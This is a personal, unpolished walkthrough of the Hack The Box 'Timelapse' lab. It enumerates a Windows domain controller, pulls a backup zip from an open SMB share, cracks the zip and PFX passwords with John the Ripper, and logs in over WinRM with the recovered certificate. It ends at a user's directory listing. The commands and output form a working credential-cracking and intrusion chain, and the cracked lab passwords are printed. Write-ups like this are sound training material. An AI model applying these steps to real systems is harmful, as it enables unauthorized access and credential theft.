This is a windows machine from hack the box.
Nmap scan
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nmap -sV -sC -oA cascade 10.10.11.152
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 08:17 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.22 seconds
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nmap -sV -sC -oA cascade 10.10.11.152 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-14 08:17 EDT
Nmap scan report for 10.10.11.152
Host is up (0.35s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open tcpwrapped
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open tcpwrapped
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m58s
| smb2-time:
| date: 2023-09-14T20:19:18
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.74 seconds
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
low hanging fruit 445 and this is a domain controller
└─$ crackmapexec smb 10.10.11.152 -u "" up ""
SMB 10.10.11.152 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/HTB/timelapse]
Domain is timelapse.htb
I add it to etc/hosts
U nano 7.2 /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
using ldapsearch but we get nothing
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=timelapse,DC=htb
namingcontexts: CN=Configuration,DC=timelapse,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=timelapse,DC=htb
namingcontexts: DC=DomainDnsZones,DC=timelapse,DC=htb
namingcontexts: DC=ForestDnsZones,DC=timelapse,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -b 'DC=timelapse,DC=htb' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
kali@kali ~/H/timelapse> ldapsearch -x -H ldap://10.10.11.152 -b 'DC=timelapse,DC=htb' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=timelapse,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
kali@kali ~/H/timelapse [1]>
try anonymous rpcclient
kali@kali ~/H/timelapse> rpcclient 10.10.11.152 -U ''
Password for [WORKGROUP\]:
rpcclient
gt; ls command not found: ls rpcclient
gt; enumdomusers result was NT_STATUS_ACCESS_DENIED rpcclient
gt; netshareenum result was WERR_ACCESS_DENIED rpcclient
gt;
Tried unauthenticated getNPusers.py. No luck
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
kali@kali /u/s/d/p/examples>
smbclient anonymously
kali@kali /u/s/d/p/examples> smbclient -L //10.10.11.152
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
kali@kali /u/s/d/p/examples>
folder called shares. we try to access this anonymously
kali@kali /u/s/d/p/examples> smbclient //10.10.11.152/shares -U ""%""
tree connect failed: NT_STATUS_ACCESS_DENIED
kali@kali /u/s/d/p/examples [1]>
tried enum4linux
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 14 08:45:06 2023
=========================================( Target Information )=========================================
Target ........... 10.10.11.152
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.11.152 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.10.11.152 )===================================
[+] Server 10.10.11.152 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.11.152 )================================
Domain Name: TIMELAPSE
Domain Sid: S-1-5-21-671920749-559770252-3318990721
[+] Host is part of a domain (not a workgroup)
=================================( Share Enumeration on 10.10.11.152 )=================================
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.11.152
enum4linux complete on Thu Sep 14 08:45:31 2023
kali@kali /u/s/d/p/examples>
connecting to the shares folder anonymously
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ smbclient \\\\10.10.11.152\\shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 1295497 blocks available
smb: \> cd dev
smb: \dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 1294828 blocks available
smb: \dev\> get winrm_backup.zip
getting file \dev\winrm_backup.zip of size 2611 as winrm_backup.zip (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)
smb: \dev\> cd ../
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
cd helpde
6367231 blocks of size 4096. 1293430 blocks available
smb: \> cd Helpdesk
smb: \Helpdesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
6367231 blocks of size 4096. 1292493 blocks available
smb: \Helpdesk\> get *.*
NT_STATUS_OBJECT_NAME_INVALID opening remote file \Helpdesk\*.*
smb: \Helpdesk\> get LAPS.x64.msi
parallel_read returned NT_STATUS_IO_TIMEOUT
^C
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ smbclient \\\\10.10.11.152\\shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
get
6367231 blocks of size 4096. 1287503 blocks available
smb: \HelpDesk\> get LAPS_Datasheet.docx
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (25.5 KiloBytes/sec) (average 25.5 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (215.3 KiloBytes/sec) (average 105.5 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (36.6 KiloBytes/sec) (average 90.4 KiloBytes/sec)
smb: \HelpDesk\> get LAPS.x64.msi
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (323.6 KiloBytes/sec) (average 154.8 KiloBytes/sec)
smb: \HelpDesk\>
We donload all the files locally
We will first check the docs. ChatGP says to read the docs we need to install libreoffice-writer
—
sudo apt update
sudo apt install libreoffice-writer
once installed – libreoffice –writer LAPS_Datasheet.docx
After installing
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ dpkg -l | grep libreoffice-writer
ii libreoffice-writer 4:7.5.5-4 amd64 office productivity suite -- word processor
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
we find that the document was prepared bya a “Jiri Formacek” but this is a microsoft employee. Well get back to this document later
Cannot open the zip file. Seems password protected
pse]
└─$
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect password
I am going to try and see whether users dev and helpdesk exist
└─$ cat users.txt
dev
helpdesk
administrator
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
using kerbrute – they dont exist
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ./kerbrute userenum --dc 10.10.11.152 -d timelapse.HTB users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/14/23 - Ronnie Flathers @ropnop
2023/09/14 09:14:04 > Using KDC(s):
2023/09/14 09:14:04 > 10.10.11.152:88
2023/09/14 09:14:04 > [+] VALID USERNAME: [email protected]
2023/09/14 09:14:04 > Done! Tested 3 usernames (1 valid) in 0.412 seconds
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
Asked chatGPT how to read the MSI
—
sudo apt install msitools
msitools extract LAPS.x64.msi outdir/
msiextract LAPS.x64.msi outdir/
ran the above
└─$ msiextract LAPS.x64.msi outdir/
PolicyDefinitions/en-US/AdmPwd.adml
PolicyDefinitions/AdmPwd.admx
LAPS/AdmPwd.UI.exe
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.Utils.dll
LAPS/AdmPwd.Utils.dll
LAPS/CSE/AdmPwd.dll
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.dll
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.psd1
WindowsPowershell/v1.0/Modules/AdmPwd.PS/AdmPwd.PS.format.ps1xml
WindowsPowershell/v1.0/Modules/AdmPwd.PS/en-US/AdmPwd.PS.dll-Help.xml
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS_OperationsGuide.docx PolicyDefinitions winrm_backup.zip
cascade.nmap LAPS LAPS_TechnicalSpecification.docx users.txt
cascade.xml LAPS_Datasheet.docx LAPS.x64.msi WindowsPowershell
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd LAPS
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ ls
AdmPwd.UI.exe AdmPwd.Utils.dll CSE
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ cd CSE
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS/CSE]
└─$ ls
AdmPwd.dll
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS/CSE]
└─$ cd ../
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ ls
AdmPwd.UI.exe AdmPwd.Utils.dll CSE
┌──(kali㉿kali)-[~/HTB/timelapse/LAPS]
└─$ cd ../
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS_OperationsGuide.docx PolicyDefinitions winrm_backup.zip
cascade.nmap LAPS LAPS_TechnicalSpecification.docx users.txt
cascade.xml LAPS_Datasheet.docx LAPS.x64.msi WindowsPowershell
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cd WindowsPowershell
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ ls
v1.0
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell]
└─$ cd v1.0
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ ls
Modules
┌──(kali㉿kali)-[~/HTB/timelapse/WindowsPowershell/v1.0]
└─$ cd Modules
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$ ls
AdmPwd.PS
┌──(kali㉿kali)-[~/…/timelapse/WindowsPowershell/v1.0/Modules]
└─$
I am a bit stuck so i will go back to the zip file and see if we can brute force it with john
with the following steps by chatGPT
john
zip2john winrm_backup.zip > winrm_backup.hash
john winrm_backup.hash
john –show winrm_backup.hash
Found the password – supremelegacy
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ zip2john winrm_backup.zip > winrm_backup.hash
Created directory: /home/kali/.john
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS_OperationsGuide.docx PolicyDefinitions winrm_backup.hash
cascade.nmap LAPS LAPS_TechnicalSpecification.docx users.txt winrm_backup.zip
cascade.xml LAPS_Datasheet.docx LAPS.x64.msi WindowsPowershell
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2023-09-14 09:50) 1.923g/s 6679Kp/s 6679Kc/s 6679KC/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
unzipping the file
ing: legacyy_dev_auth.pfx
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS_OperationsGuide.docx legacyy_dev_auth.pfx WindowsPowershell
cascade.nmap LAPS LAPS_TechnicalSpecification.docx PolicyDefinitions winrm_backup.hash
cascade.xml LAPS_Datasheet.docx LAPS.x64.msi users.txt winrm_backup.zip
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat legacyy_dev_auth.pfx
Fo–und the file — legacyy_dev_auth.pfx
from chatGPT
The `.pfx` file is a PKCS#12 archive, which usually contains both a private key and its corresponding X.509 digital certificate. You can use `openssl` to manage and read these files.
To extract the private key from the `.pfx` file: openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
To extract the certificate from the `.pfx` file: openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
We try the above but the password does not work
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
Enter Import Password:
Mac verify error: invalid password?
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out privatekey.pem
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:
Mac verify error: invalid password?
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:
Mac verify error: invalid password?
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
We are going to try anbd bruteforce the password
ChatGPT suggests we use pfx2joh.py which we install via
git clone https://github.com/magnumripper/JohnTheRipper.git
cd JohnTheRipper/src
./configure && make
Then we run the command inside the run folder to bruteforce
┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ ./pfx2john.py ~/HTB/timelapse/legacyy_dev_auth.pfx > pfx.hash
┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$ john pfx.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:02:58 DONE (2023-09-14 10:09) 0.005616g/s 18148p/s 18148c/s 18148C/s thuglife06..thug211
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/HTB/timelapse/JohnTheRipper/run]
└─$
password is thuglegacy
we run the two command again
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -out legacyy_dev_auth.pem
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
Enter Import Password:
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ls
cascade.gnmap kerbrute LAPS.x64.msi privatekey.pem winrm_backup.zip
cascade.nmap LAPS legacyy_dev_auth.pem temp.pem
cascade.xml LAPS_Datasheet.docx legacyy_dev_auth.pfx users.txt
certificate.crt LAPS_OperationsGuide.docx pfx.hash WindowsPowershell
JohnTheRipper LAPS_TechnicalSpecification.docx PolicyDefinitions winrm_backup.hash
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat certificate.crt
Bag Attributes
localKeyID: 01 00 00 00
subject=CN = Legacyy
issuer=CN = Legacyy
-----BEGIN CERTIFICATE-----
MIIDJjCCAg6gAwIBAgIQHZmJKYrPEbtBk6HP9E4S3zANBgkqhkiG9w0BAQsFADAS
MRAwDgYDVQQDDAdMZWdhY3l5MB4XDTIxMTAyNTE0MDU1MloXDTMxMTAyNTE0MTU1
MlowEjEQMA4GA1UEAwwHTGVnYWN5eTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCC
AQoCggEBAKVWB6NiFkce4vNNI61hcc6LnrNKhyv2ibznhgO7/qocFrg1/zEU/og0
0E2Vha8DEK8ozxpCwem/e2inClD5htFkO7U3HKG9801NFeN0VBX2ciIqSjA63qAb
YX707mBUXg8Ccc+b5hg/CxuhGRhXxA6nMiLo0xmAMImuAhJZmZQepOHJsVb/s86Z
7WCzq2I3VcWg+7XM05hogvd21lprNdwvDoilMlE8kBYa22rIWiaZismoLMJJpa72
MbSnWEoruaTrC8FJHxB8dbapf341ssp6AK37+MBrq7ZX2W74rcwLY1pLM6giLkcs
yOeu6NGgLHe/plcvQo8IXMMwSosUkfECAwEAAaN4MHYwDgYDVR0PAQH/BAQDAgWg
MBMGA1UdJQQMMAoGCCsGAQUFBwMCMDAGA1UdEQQpMCegJQYKKwYBBAGCNxQCA6AX
DBVsZWdhY3l5QHRpbWVsYXBzZS5odGIwHQYDVR0OBBYEFMzZDuSvIJ6wdSv9gZYe
rC2xJVgZMA0GCSqGSIb3DQEBCwUAA4IBAQBfjvt2v94+/pb92nLIS4rna7CIKrqa
m966H8kF6t7pHZPlEDZMr17u50kvTN1D4PtlCud9SaPsokSbKNoFgX1KNX5m72F0
3KCLImh1z4ltxsc6JgOgncCqdFfX3t0Ey3R7KGx6reLtvU4FZ+nhvlXTeJ/PAXc/
fwa2rfiPsfV51WTOYEzcgpngdHJtBqmuNw3tnEKmgMqp65KYzpKTvvM1JjhI5txG
hqbdWbn2lS4wjGy3YGRZw6oM667GF13Vq2X3WHZK5NaP+5Kawd/J+Ms6riY0PDbh
nx143vIioHYMiGCnKsHdWiMrG2UWLOoeUrlUmpr069kY/nn7+zSEa2pA
-----END CERTIFICATE-----
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ cat privatekey.pem
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
viewing the cert . Again, advice by chatGPT — openssl x509 -in certificate.crt -text -noout
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ openssl x509 -in certificate.crt -text -noout
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
1d:99:89:29:8a:cf:11:bb:41:93:a1:cf:f4:4e:12:df
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN = Legacyy
Validity
Not Before: Oct 25 14:05:52 2021 GMT
Not After : Oct 25 14:15:52 2031 GMT
Subject: CN = Legacyy
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
00:a5:56:07:a3:62:16:47:1e:e2:f3:4d:23:ad:61:
71:ce:8b:9e:b3:4a:87:2b:f6:89:bc:e7:86:03:bb:
fe:aa:1c:16:b8:35:ff:31:14:fe:88:34:d0:4d:95:
85:af:03:10:af:28:cf:1a:42:c1:e9:bf:7b:68:a7:
0a:50:f9:86:d1:64:3b:b5:37:1c:a1:bd:f3:4d:4d:
15:e3:74:54:15:f6:72:22:2a:4a:30:3a:de:a0:1b:
61:7e:f4:ee:60:54:5e:0f:02:71:cf:9b:e6:18:3f:
0b:1b:a1:19:18:57:c4:0e:a7:32:22:e8:d3:19:80:
30:89:ae:02:12:59:99:94:1e:a4:e1:c9:b1:56:ff:
b3:ce:99:ed:60:b3:ab:62:37:55:c5:a0:fb:b5:cc:
d3:98:68:82:f7:76:d6:5a:6b:35:dc:2f:0e:88:a5:
32:51:3c:90:16:1a:db:6a:c8:5a:26:99:8a:c9:a8:
2c:c2:49:a5:ae:f6:31:b4:a7:58:4a:2b:b9:a4:eb:
0b:c1:49:1f:10:7c:75:b6:a9:7f:7e:35:b2:ca:7a:
00:ad:fb:f8:c0:6b:ab:b6:57:d9:6e:f8:ad:cc:0b:
63:5a:4b:33:a8:22:2e:47:2c:c8:e7:ae:e8:d1:a0:
2c:77:bf:a6:57:2f:42:8f:08:5c:c3:30:4a:8b:14:
91:f1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Client Authentication
X509v3 Subject Alternative Name:
othername: UPN::[email protected]
X509v3 Subject Key Identifier:
CC:D9:0E:E4:AF:20:9E:B0:75:2B:FD:81:96:1E:AC:2D:B1:25:58:19
Signature Algorithm: sha256WithRSAEncryption
Signature Value:
5f:8e:fb:76:bf:de:3e:fe:96:fd:da:72:c8:4b:8a:e7:6b:b0:
88:2a:ba:9a:9b:de:ba:1f:c9:05:ea:de:e9:1d:93:e5:10:36:
4c:af:5e:ee:e7:49:2f:4c:dd:43:e0:fb:65:0a:e7:7d:49:a3:
ec:a2:44:9b:28:da:05:81:7d:4a:35:7e:66:ef:61:74:dc:a0:
8b:22:68:75:cf:89:6d:c6:c7:3a:26:03:a0:9d:c0:aa:74:57:
d7:de:dd:04:cb:74:7b:28:6c:7a:ad:e2:ed:bd:4e:05:67:e9:
e1:be:55:d3:78:9f:cf:01:77:3f:7f:06:b6:ad:f8:8f:b1:f5:
79:d5:64:ce:60:4c:dc:82:99:e0:74:72:6d:06:a9:ae:37:0d:
ed:9c:42:a6:80:ca:a9:eb:92:98:ce:92:93:be:f3:35:26:38:
48:e6:dc:46:86:a6:dd:59:b9:f6:95:2e:30:8c:6c:b7:60:64:
59:c3:aa:0c:eb:ae:c6:17:5d:d5:ab:65:f7:58:76:4a:e4:d6:
8f:fb:92:9a:c1:df:c9:f8:cb:3a:ae:26:34:3c:36:e1:9f:1d:
78:de:f2:22:a0:76:0c:88:60:a7:2a:c1:dd:5a:23:2b:1b:65:
16:2c:ea:1e:52:b9:54:9a:9a:f4:eb:d9:18:fe:79:fb:fb:34:
I see a user [email protected]
Using kerbrute to see if its valid and it is valid
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ nano users.txt
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$ ./kerbrute userenum --dc 10.10.11.152 -d timelapse.HTB users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/14/23 - Ronnie Flathers @ropnop
2023/09/14 10:20:03 > Using KDC(s):
2023/09/14 10:20:03 > 10.10.11.152:88
2023/09/14 10:20:03 > [+] VALID USERNAME: [email protected]
2023/09/14 10:20:03 > [+] VALID USERNAME: [email protected]
2023/09/14 10:20:03 > Done! Tested 4 usernames (2 valid) in 0.349 seconds
┌──(kali㉿kali)-[~/HTB/timelapse]
└─$
we try getNPusers but no luck getting hash
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py timelapse.HTB/legacyy
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate legacyy, getting its TGT
[-] User legacyy doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
chatGPT suggests that we can use cert and pem. Intersting
evil-winrm -i [TARGET_IP] -u [USERNAME] -c /path/to/certificate.crt -k /path/to/privatekey.pem
tried the command but failked
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
/usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:72:in `validate_required_fields': password is a required option (RuntimeError)
from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:59:in `validate'
from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection_opts.rb:31:in `create_with_defaults'
from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:64:in `configure_connection_opts'
from /usr/share/rubygems-integration/all/gems/winrm-2.3.6/lib/winrm/connection.rb:27:in `initialize'
from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:314:in `new'
from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:314:in `connection_initialization'
from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:496:in `main'
from /usr/share/rubygems-integration/all/gems/evil-winrm-3.5/bin/evil-winrm:1029:in `<top (required)>'
from /usr/bin/evil-winrm:25:in `load'
from /usr/bin/evil-winrm:25:in `<main>'
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -i 10.10.11.152 -u legaccy -p "dummy" -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: Useless cert/s provided, SSL is not enabled
Info: Establishing connection to remote endpoint
^C
Warning: Press "y" to exit, press any other key to continue
Info: Exiting...
after looking online looks like we have to do -S to force it to use ssl so we use the initial command with -S
evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -S -i 10.10.11.152 -u legaccy -c /home/kali/HTB/timelapse/certificate.crt -k /home/kali/HTB/timelapse/privatekey.pem
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents>
and we are in!!!
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ../
*Evil-WinRM* PS C:\Users\legacyy> ls
Directory: C:\Users\legacyy
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/25/2021 8:25 AM Desktop
d-r--- 10/25/2021 8:22 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
